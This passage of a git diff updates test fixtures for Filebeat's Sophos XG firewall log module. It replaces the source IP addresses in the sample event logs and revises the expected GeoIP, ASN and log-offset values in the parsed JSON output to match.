         "observer.product": "XG",
         "observer.serial_number": "1234567890123456",
         "observer.type": "firewall",
@@ -539,13 +491,6 @@
         "@timestamp": "2016-12-02T18:50:20.000-02:00",
         "client.ip": "192.168.73.220",
         "client.port": 37832,
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "64.233.189.147",
         "destination.port": 80,
         "event.action": "warned",
@@ -568,7 +513,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 5258,
+        "log.offset": 5265,
         "network.transport": "tcp",
         "observer.product": "XG",
         "observer.serial_number": "C01001K234RXPA1",
@@ -617,13 +562,6 @@
         "@timestamp": "2016-12-02T18:50:22.000-02:00",
         "client.ip": "192.168.73.220",
         "client.port": 46322,
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "64.233.188.94",
         "destination.port": 80,
         "event.action": "allowed",
@@ -646,7 +584,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 5873,
+        "log.offset": 5880,
         "network.transport": "tcp",
         "observer.product": "XG",
         "observer.serial_number": "C01001K234RXPA1",
diff --git a/x-pack/filebeat/module/sophos/xg/test/event.log b/x-pack/filebeat/module/sophos/xg/test/event.log
index d345122ad5a7..8ec039f86e22 100644
--- a/x-pack/filebeat/module/sophos/xg/test/event.log
+++ b/x-pack/filebeat/module/sophos/xg/test/event.log
@@ -1,15 +1,15 @@
 <30>device="SFW" date=2020-05-18 time=14:38:57 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062910617701 log_type="Event" log_component="Firewall Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="Open Group" auth_client="CTA" auth_mechanism="AD" reason="" src_ip=172.17.35.116 message="User elastic.user@elastic.test.com of group Open Group logged in successfully to Firewall through AD authentication mechanism from 172.17.35.116" name="elastic.user@elastic.test.com" src_mac=
-<30>device="SFW" date=2020-05-18 time=14:38:58 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062511418055 log_type="Event" log_component="IPSec" log_subtype="System" status="Failed" priority=Warning user_name="elastic.user@elastic.test.com" connectionname="Location-1" connectiontype="0" localinterfaceip=214.167.51.66 localgateway="" localnetwork="172.17.32.0/19" remoteinterfaceip=83.20.132.250 remotenetwork="10.84.234.5/32" message="location-1 - IKE message retransmission timed out (Remote: 83.20.132.250)"
+<30>device="SFW" date=2020-05-18 time=14:38:58 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062511418055 log_type="Event" log_component="IPSec" log_subtype="System" status="Failed" priority=Warning user_name="elastic.user@elastic.test.com" connectionname="Location-1" connectiontype="0" localinterfaceip=214.167.51.66 localgateway="" localnetwork="172.17.32.0/19" remoteinterfaceip=89.160.20.112 remotenetwork="10.84.234.5/32" message="location-1 - IKE message retransmission timed out (Remote: 89.160.20.112)"
 <30>device="SFW" date=2020-05-18 time=14:38:59 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062511318057 log_type="Event" log_component="IPSec" log_subtype="System" status="Expire" priority=Error user_name="" connectionname="" connectiontype="0" localinterfaceip="" localgateway="" localnetwork="" remoteinterfaceip="" remotenetwork="" message="IKE_SA timed out before it could be established"
-<30>device="SFW" date=2020-05-18 time=14:39:00 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063210617704 log_type="Event" log_component="My Account Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="" auth_client="N/A" auth_mechanism="Local" reason="" src_ip=83.9.140.96 message="User elastic.user@elastic.test.com logged in successfully to MyAccount through Local authentication mechanism" name="" src_mac=
+<30>device="SFW" date=2020-05-18 time=14:39:00 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063210617704 log_type="Event" log_component="My Account Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="" auth_client="N/A" auth_mechanism="Local" reason="" src_ip=67.43.156.13 message="User elastic.user@elastic.test.com logged in successfully to MyAccount through Local authentication mechanism" name="" src_mac=
 <30>device="SFW" date=2020-05-18 time=14:39:01 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=064011517819 log_type="Event" log_component="Anti-Virus" log_subtype="System" priority=Notice status="Successful" oldversion=1.0.407794 newversion=1.0.407795  message="Avira AV definitions upgraded from 1.0.407794 to 1.0.407795."
 <30>device="SFW" date=2020-05-18 time=14:39:02 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=063411660022 log_type="Event" log_component="DHCP Server" log_subtype="System" status="Expire" priority=Information ipaddress="192.168.110.10" client_physical_address="-" client_host_name="" message="Lease 192.168.110.10 expired" raw_data="192.168.110.10"
-<30>device="SFW" date=2020-05-18 time=14:39:03 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063110617710 log_type="Event" log_component="SSL VPN Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="" auth_client="N/A" auth_mechanism="AD" reason="" src_ip=217.250.157.135 message="User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism" name="" src_mac=
+<30>device="SFW" date=2020-05-18 time=14:39:03 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063110617710 log_type="Event" log_component="SSL VPN Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="" auth_client="N/A" auth_mechanism="AD" reason="" src_ip=81.2.69.145 message="User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism" name="" src_mac=
 <30>device="SFW" date=2020-05-18 time=14:39:04 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062811617824 log_type="Event" log_component="SSL VPN" log_subtype="System" priority=Information Mode="Remote Access" sessionid="" starttime=0 user_name="elastic.user@elastic.test.com" ipaddress=10.82.234.5 sent_bytes=0 recv_bytes=0 status="Established" message="SSL VPN User 'elastic.user@elastic.test.com' connected " timestamp=1589960866 connectionname="" remote_ip=10.82.234.12
-<30>device="SFW" date=2020-05-18 time=14:39:05 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063010517708 log_type="Event" log_component="VPN Authentication" log_subtype="Authentication" status="Failed" priority=Notice user_name="hendrikl" usergroupname="" auth_client="N/A" auth_mechanism="AD,AD,Local" reason="wrong credentials" src_ip=91.67.201.4 message="User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials" name="" src_mac=
+<30>device="SFW" date=2020-05-18 time=14:39:05 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063010517708 log_type="Event" log_component="VPN Authentication" log_subtype="Authentication" status="Failed" priority=Notice user_name="hendrikl" usergroupname="" auth_client="N/A" auth_mechanism="AD,AD,Local" reason="wrong credentials" src_ip=1.128.3.4 message="User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials" name="" src_mac=
 <30>device="SFW" date=2020-05-18 time=14:39:06 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=066911518017 log_type="Event" log_component="ATP" log_subtype="System" priority=Notice status="Successful" oldversion=1.0.0297 newversion=1.0.0298  message="ATP definitions upgraded from 1.0.0297 to 1.0.0298."
 <30>device="SFW" date=2020-05-18 time=14:39:07 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=062009617502 log_type="Event" log_component="GUI" log_subtype="Admin" status="Successful" priority=Information user_name="admin" src_ip=10.83.234.5 SysLog_SERVER_NAME='Logstash' message="SysLog Server 'Logstash' settings were changed by 'admin' from '10.83.234.5' using 'GUI'"
-<30>device="SFW" date=2020-05-18 time=14:39:08 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062109517507 log_type="Event" log_component="CLI" log_subtype="Admin" status="Failed" priority=Notice user_name="root" src_ip=172.66.35.15 message="User 'root' failed to login from '172.66.35.15' using ssh because of wrong credentials"
+<30>device="SFW" date=2020-05-18 time=14:39:08 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=062109517507 log_type="Event" log_component="CLI" log_subtype="Admin" status="Failed" priority=Notice user_name="root" src_ip=175.16.199.1 message="User 'root' failed to login from '175.16.199.1' using ssh because of wrong credentials"
 <30>device="SFW" date=2020-05-18 time=14:39:09 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063911517818 log_type="Event" log_component="IPS" log_subtype="System" priority=Notice status="Successful" oldversion=9.17.09 newversion=9.17.10  message="IPS definitions upgraded from 9.17.09 to 9.17.10."
 <30>device="SFW" date=2020-05-18 time=14:39:10 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063311617923 log_type="Event" log_component="Appliance" log_subtype="System" priority=Information backup_mode='appliance'  message="Scheduled backup to appliance   is successful."
 <30>device="SFW" date=2020-05-18 time=14:39:20 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=062910617703 log_type="Event" log_component="Firewall Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="VPN.SSL.Users.elastic" auth_client="IPSec" auth_mechanism="N/A" reason="" src_ip=10.84.234.38 src_mac="" start_time=1591086575 sent_bytes=0 recv_bytes=0 message="User elastic.user@elastic.test.com was logged out of firewall" name="elastic.user@elastic.test.com" timestamp=1591086576
diff --git a/x-pack/filebeat/module/sophos/xg/test/event.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/event.log-expected.json
index 5fee95e19776..179a156aaf58 100644
--- a/x-pack/filebeat/module/sophos/xg/test/event.log-expected.json
+++ b/x-pack/filebeat/module/sophos/xg/test/event.log-expected.json
@@ -58,20 +58,15 @@
     },
     {
         "@timestamp": "2020-05-18T14:38:58.000-02:00",
-        "client.ip": "83.20.132.250",
+        "client.ip": "89.160.20.112",
         "destination.as.number": 721,
         "destination.as.organization.name": "DoD Network Information Center",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "214.167.51.66",
         "event.code": "062511418055",
         "event.dataset": "sophos.xg",
         "event.kind": "event",
         "event.module": "sophos",
-        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:58 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062511418055 log_type=\"Event\" log_component=\"IPSec\" log_subtype=\"System\" status=\"Failed\" priority=Warning user_name=\"elastic.user@elastic.test.com\" connectionname=\"Location-1\" connectiontype=\"0\" localinterfaceip=214.167.51.66 localgateway=\"\" localnetwork=\"172.17.32.0/19\" remoteinterfaceip=83.20.132.250 remotenetwork=\"10.84.234.5/32\" message=\"location-1 - IKE message retransmission timed out (Remote: 83.20.132.250)\"",
+        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:58 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062511418055 log_type=\"Event\" log_component=\"IPSec\" log_subtype=\"System\" status=\"Failed\" priority=Warning user_name=\"elastic.user@elastic.test.com\" connectionname=\"Location-1\" connectiontype=\"0\" localinterfaceip=214.167.51.66 localgateway=\"\" localnetwork=\"172.17.32.0/19\" remoteinterfaceip=89.160.20.112 remotenetwork=\"10.84.234.5/32\" message=\"location-1 - IKE message retransmission timed out (Remote: 89.160.20.112)\"",
         "event.severity": "4",
         "event.timezone": "-02:00",
         "fileset.name": "xg",
@@ -79,7 +74,7 @@
         "input.type": "log",
         "log.level": "warning",
         "log.offset": 597,
-        "message": "location-1 - IKE message retransmission timed out (Remote: 83.20.132.250)",
+        "message": "location-1 - IKE message retransmission timed out (Remote: 89.160.20.112)",
         "observer.product": "XG",
         "observer.serial_number": "1234567890123456",
         "observer.type": "firewall",
@@ -89,7 +84,7 @@
         ],
         "related.ip": [
             "214.167.51.66",
-            "83.20.132.250"
+            "89.160.20.112"
         ],
         "related.user": [
             "elastic.user@elastic.test.com"
@@ -108,17 +103,17 @@
         "sophos.xg.priority": "Warning",
         "sophos.xg.remotenetwork": "10.84.234.5/32",
         "sophos.xg.status": "Failed",
-        "source.as.number": 5617,
-        "source.as.organization.name": "Orange Polska Spolka Akcyjna",
-        "source.geo.city_name": "Elblag",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "PL",
-        "source.geo.country_name": "Poland",
-        "source.geo.location.lat": 54.172,
-        "source.geo.location.lon": 19.4195,
-        "source.geo.region_iso_code": "PL-28",
-        "source.geo.region_name": "Warmia-Masuria",
-        "source.ip": "83.20.132.250",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.112",
         "source.user.name": "elastic.user@elastic.test.com",
         "tags": [
             "forwarded",
@@ -164,7 +159,7 @@
     },
     {
         "@timestamp": "2020-05-18T14:39:00.000-02:00",
-        "client.ip": "83.9.140.96",
+        "client.ip": "67.43.156.13",
         "event.category": [
             "authentication"
         ],
@@ -172,7 +167,7 @@
         "event.dataset": "sophos.xg",
         "event.kind": "event",
         "event.module": "sophos",
-        "event.original": "device=\"SFW\" date=2020-05-18 time=14:39:00 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063210617704 log_type=\"Event\" log_component=\"My Account Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"Local\" reason=\"\" src_ip=83.9.140.96 message=\"User elastic.user@elastic.test.com logged in successfully to MyAccount through Local authentication mechanism\" name=\"\" src_mac=",
+        "event.original": "device=\"SFW\" date=2020-05-18 time=14:39:00 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063210617704 log_type=\"Event\" log_component=\"My Account Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"Local\" reason=\"\" src_ip=67.43.156.13 message=\"User elastic.user@elastic.test.com logged in successfully to MyAccount through Local authentication mechanism\" name=\"\" src_mac=",
         "event.outcome": "success",
         "event.severity": "6",
         "event.timezone": "-02:00",
@@ -194,7 +189,7 @@
             "my_fancy_host"
         ],
         "related.ip": [
-            "83.9.140.96"
+            "67.43.156.13"
         ],
         "related.user": [
             "elastic.user@elastic.test.com"
@@ -209,17 +204,13 @@
         "sophos.xg.message_id": "17704",
         "sophos.xg.priority": "Information",
         "sophos.xg.status": "Successful",
-        "source.as.number": 5617,
-        "source.as.organization.name": "Orange Polska Spolka Akcyjna",
-        "source.geo.city_name": "August\u00f3w",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "PL",
-        "source.geo.country_name": "Poland",
-        "source.geo.location.lat": 53.845,
-        "source.geo.location.lon": 22.985,
-        "source.geo.region_iso_code": "PL-20",
-        "source.geo.region_name": "Podlasie",
-        "source.ip": "83.9.140.96",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.name": "elastic.user@elastic.test.com",
         "tags": [
             "forwarded",
@@ -247,7 +238,7 @@
         "host.name": "my_fancy_host",
         "input.type": "log",
         "log.level": "notification",
-        "log.offset": 2080,
+        "log.offset": 2081,
         "message": "Avira AV definitions upgraded from 1.0.407794 to 1.0.407795.",
         "observer.product": "XG",
         "observer.serial_number": "1234567890123456",
@@ -285,7 +276,7 @@
         "host.name": "some_other_host.local",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 2428,
+        "log.offset": 2429,
         "message": "Lease 192.168.110.10 expired",
         "observer.product": "XG",
         "observer.serial_number": "1234567890123457",
@@ -312,7 +303,7 @@
     },
     {
         "@timestamp": "2020-05-18T14:39:03.000-02:00",
-        "client.ip": "217.250.157.135",
+        "client.ip": "81.2.69.145",
         "event.category": [
             "authentication"
         ],
@@ -320,7 +311,7 @@
         "event.dataset": "sophos.xg",
         "event.kind": "event",
         "event.module": "sophos",
-        "event.original": "device=\"SFW\" date=2020-05-18 time=14:39:03 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063110617710 log_type=\"Event\" log_component=\"SSL VPN Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"AD\" reason=\"\" src_ip=217.250.157.135 message=\"User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism\" name=\"\" src_mac=",
+        "event.original": "device=\"SFW\" date=2020-05-18 time=14:39:03 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063110617710 log_type=\"Event\" log_component=\"SSL VPN Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"AD\" reason=\"\" src_ip=81.2.69.145 message=\"User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism\" name=\"\" src_mac=",
         "event.outcome": "success",
         "event.severity": "6",
         "event.timezone": "-02:00",
@@ -332,7 +323,7 @@
         "host.name": "my_fancy_host",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 2802,
+        "log.offset": 2803,
         "message": "User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism",
         "observer.product": "XG",
         "observer.serial_number": "1234567890123456",
@@ -342,7 +333,7 @@
             "my_fancy_host"
         ],
         "related.ip": [
-            "217.250.157.135"
+            "81.2.69.145"
         ],
         "related.user": [
             "elastic.user@elastic.test.com"
@@ -357,17 +348,15 @@
         "sophos.xg.message_id": "17710",
         "sophos.xg.priority": "Information",
         "sophos.xg.status": "Successful",
-        "source.as.number": 3320,
-        "source.as.organization.name": "Deutsche Telekom AG",
-        "source.geo.city_name": "Schleidweiler",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "DE",
-        "source.geo.country_name": "Germany",
-        "source.geo.location.lat": 49.8808,
-        "source.geo.location.lon": 6.6593,
-        "source.geo.region_iso_code": "DE-RP",
-        "source.geo.region_name": "Rheinland-Pfalz",
-        "source.ip": "217.250.157.135",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.145",
         "source.user.name": "elastic.user@elastic.test.com",
         "tags": [
             "forwarded",
@@ -390,7 +379,7 @@
         "host.name": "my_fancy_host",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 3333,
+        "log.offset": 3330,
         "message": "SSL VPN User 'elastic.user@elastic.test.com' connected ",
         "observer.product": "XG",
         "observer.serial_number": "1234567890123456",
@@ -426,7 +415,7 @@
     },
     {
         "@timestamp": "2020-05-18T14:39:05.000-02:00",
-        "client.ip": "91.67.201.4",
+        "client.ip": "1.128.3.4",
         "event.category": [
             "authentication"
         ],
@@ -434,7 +423,7 @@
         "event.dataset": "sophos.xg",
         "event.kind": "event",
         "event.module": "sophos",
-        "event.original": "device=\"SFW\" date=2020-05-18 time=14:39:05 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063010517708 log_type=\"Event\" log_component=\"VPN Authentication\" log_subtype=\"Authentication\" status=\"Failed\" priority=Notice user_name=\"hendrikl\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"AD,AD,Local\" reason=\"wrong credentials\" src_ip=91.67.201.4 message=\"User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials\" name=\"\" src_mac=",
+        "event.original": "device=\"SFW\" date=2020-05-18 time=14:39:05 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063010517708 log_type=\"Event\" log_component=\"VPN Authentication\" log_subtype=\"Authentication\" status=\"Failed\" priority=Notice user_name=\"hendrikl\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"AD,AD,Local\" reason=\"wrong credentials\" src_ip=1.128.3.4 message=\"User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials\" name=\"\" src_mac=",
         "event.outcome": "failure",
         "event.severity": "5",
         "event.timezone": "-02:00",
@@ -442,7 +431,7 @@
         "host.name": "my_fancy_host",
         "input.type": "log",
         "log.level": "notification",
-        "log.offset": 3832,
+        "log.offset": 3829,
         "message": "User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials",
         "observer.product": "XG",
         "observer.serial_number": "1234567890123456",
@@ -452,7 +441,7 @@
             "my_fancy_host"
         ],
         "related.ip": [
-            "91.67.201.4"
+            "1.128.3.4"
         ],
         "related.user": [
             "hendrikl"
@@ -468,17 +457,9 @@
         "sophos.xg.priority": "Notice",
         "sophos.xg.reason": "wrong credentials",
         "sophos.xg.status": "Failed",
-        "source.as.number": 31334,
-        "source.as.organization.name": "Vodafone Kabel Deutschland GmbH",
-        "source.geo.city_name": "Fell",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "DE",
-        "source.geo.country_name": "Germany",
-        "source.geo.location.lat": 49.7667,
-        "source.geo.location.lon": 6.7833,
-        "source.geo.region_iso_code": "DE-RP",
-        "source.geo.region_name": "Rheinland-Pfalz",
-        "source.ip": "91.67.201.4",
+        "source.as.number": 1221,
+        "source.as.organization.name": "Telstra Pty Ltd",
+        "source.ip": "1.128.3.4",
         "source.user.name": "hendrikl",
         "tags": [
             "forwarded",
@@ -499,7 +480,7 @@
         "host.name": "my_fancy_host",
         "input.type": "log",
         "log.level": "notification",
-        "log.offset": 4346,
+        "log.offset": 4341,
         "message": "ATP definitions upgraded from 1.0.0297 to 1.0.0298.",
         "observer.product": "XG",
         "observer.serial_number": "1234567890123456",
@@ -538,7 +519,7 @@
         "host.name": "some_other_host.local",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 4674,
+        "log.offset": 4669,
         "message": "SysLog Server 'Logstash' settings were changed by 'admin' from '10.83.234.5' using 'GUI'",
         "observer.product": "XG",
         "observer.serial_number": "1234567890123457",
@@ -572,12 +553,12 @@
     },
     {
         "@timestamp": "2020-05-18T14:39:08.000-02:00",
-        "client.ip": "172.66.35.15",
+        "client.ip": "175.16.199.1",
         "event.code": "062109517507",
         "event.dataset": "sophos.xg",
         "event.kind": "event",
         "event.module": "sophos",
-        "event.original": "device=\"SFW\" date=2020-05-18 time=14:39:08 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062109517507 log_type=\"Event\" log_component=\"CLI\" log_subtype=\"Admin\" status=\"Failed\" priority=Notice user_name=\"root\" src_ip=172.66.35.15 message=\"User 'root' failed to login from '172.66.35.15' using ssh because of wrong credentials\"",
+        "event.original": "device=\"SFW\" date=2020-05-18 time=14:39:08 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062109517507 log_type=\"Event\" log_component=\"CLI\" log_subtype=\"Admin\" status=\"Failed\" priority=Notice user_name=\"root\" src_ip=175.16.199.1 message=\"User 'root' failed to login from '175.16.199.1' using ssh because of wrong credentials\"",
         "event.outcome": "failure",
         "event.severity": "5",
         "event.timezone": "-02:00",
@@ -585,8 +566,8 @@
         "host.name": "my_fancy_host",
         "input.type": "log",
         "log.level": "notification",
-        "log.offset": 5069,
-        "message": "User 'root' failed to login from '172.66.35.15' using ssh because of wrong credentials",
+        "log.offset": 5064,
+        "message": "User 'root' failed to login from '175.16.199.1' using ssh because of wrong credentials",
         "observer.product": "XG",
         "observer.serial_number": "1234567890123456",
         "observer.type": "firewall",
@@ -595,7 +576,7 @@
             "my_fancy_host"
         ],
         "related.ip": [
-            "172.66.35.15"
+            "175.16.199.1"
         ],
         "related.user": [
             "root"
@@ -609,12 +590,15 @@
         "sophos.xg.message_id": "17507",
         "sophos.xg.priority": "Notice",
         "sophos.xg.status": "Failed",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "172.66.35.15",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "source.user.name": "root",
         "tags": [
             "forwarded",
@@ -634,7 +618,7 @@
         "host.name": "my_fancy_host",
         "input.type": "log",
         "log.level": "notification",
-        "log.offset": 5423,
+        "log.offset": 5418,
         "message": "IPS definitions upgraded from 9.17.09 to 9.17.10.",
         "observer.product": "XG",
         "observer.serial_number": "1234567890123456",
@@ -672,7 +656,7 @@
         "host.name": "my_fancy_host",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 5747,
+        "log.offset": 5742,
         "message": "Scheduled backup to appliance   is successful.",
         "observer.product": "XG",
         "observer.serial_number": "1234567890123456",
@@ -721,7 +705,7 @@
         "host.name": "some_other_host.local",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 6045,
+        "log.offset": 6040,
         "message": "User elastic.user@elastic.test.com was logged out of firewall",
         "observer.product": "XG",
         "observer.serial_number": "1234567890123457",
@@ -777,7 +761,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 6643,
+        "log.offset": 6638,
         "message": "A350196C47072B0/Gaurav Patel is now re-connected after 164000 ms",
         "observer.product": "XG",
         "observer.serial_number": "S1601E1F9FCB7EE",
@@ -791,7 +775,7 @@
         "sophos.xg.branch_name": "Gaurav Patel",
         "sophos.xg.device": "SFW",
         "sophos.xg.device_name": "XG125w",
-        "sophos.xg.eventtime": "2017-03-16T12:56:01.000+02:00",
+        "sophos.xg.eventtime": "2017-03-16T08:56:01.000-02:00",
         "sophos.xg.log_component": "RED",
         "sophos.xg.log_subtype": "System",
         "sophos.xg.log_type": "Event",
@@ -823,7 +807,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 7072,
+        "log.offset": 7067,
         "message": "A350196C47072B0/Gaurav Patel is now disconnected",
         "observer.product": "XG",
         "observer.serial_number": "S1601E1F9FCB7EE",
@@ -837,7 +821,7 @@
         "sophos.xg.branch_name": "Gaurav Patel",
         "sophos.xg.device": "SFW",
         "sophos.xg.device_name": "XG125w",
-        "sophos.xg.eventtime": "2017-03-16T12:53:27.000+02:00",
+        "sophos.xg.eventtime": "2017-03-16T08:53:27.000-02:00",
         "sophos.xg.log_component": "RED",
         "sophos.xg.log_subtype": "System",
         "sophos.xg.log_type": "Event",
@@ -869,7 +853,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 7491,
+        "log.offset": 7486,
         "message": "A350196C47072B0/NY transfered bytes TX: 0 RX: 0",
         "observer.product": "XG",
         "observer.serial_number": "S1601E1F9FCB7EE",
@@ -883,7 +867,7 @@
         "sophos.xg.branch_name": "NY",
         "sophos.xg.device": "SFW",
         "sophos.xg.device_name": "XG125w",
-        "sophos.xg.eventtime": "2017-03-16T12:46:26.000+02:00",
+        "sophos.xg.eventtime": "2017-03-16T08:46:26.000-02:00",
         "sophos.xg.log_component": "RED",
         "sophos.xg.log_subtype": "System",
         "sophos.xg.log_type": "Event",
@@ -910,7 +894,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "notification",
-        "log.offset": 7886,
+        "log.offset": 7881,
         "message": "DDNS update for host test1.customtest.dyndns.org was Successful. Updated with IP 10.198.232.86.",
         "observer.product": "XG",
         "observer.serial_number": "S4000806149EE49",
diff --git a/x-pack/filebeat/module/sophos/xg/test/firewall.log b/x-pack/filebeat/module/sophos/xg/test/firewall.log
index 5308affaf8e7..920661cc9c28 100644
--- a/x-pack/filebeat/module/sophos/xg/test/firewall.log
+++ b/x-pack/filebeat/module/sophos/xg/test/firewall.log
@@ -1,20 +1,20 @@
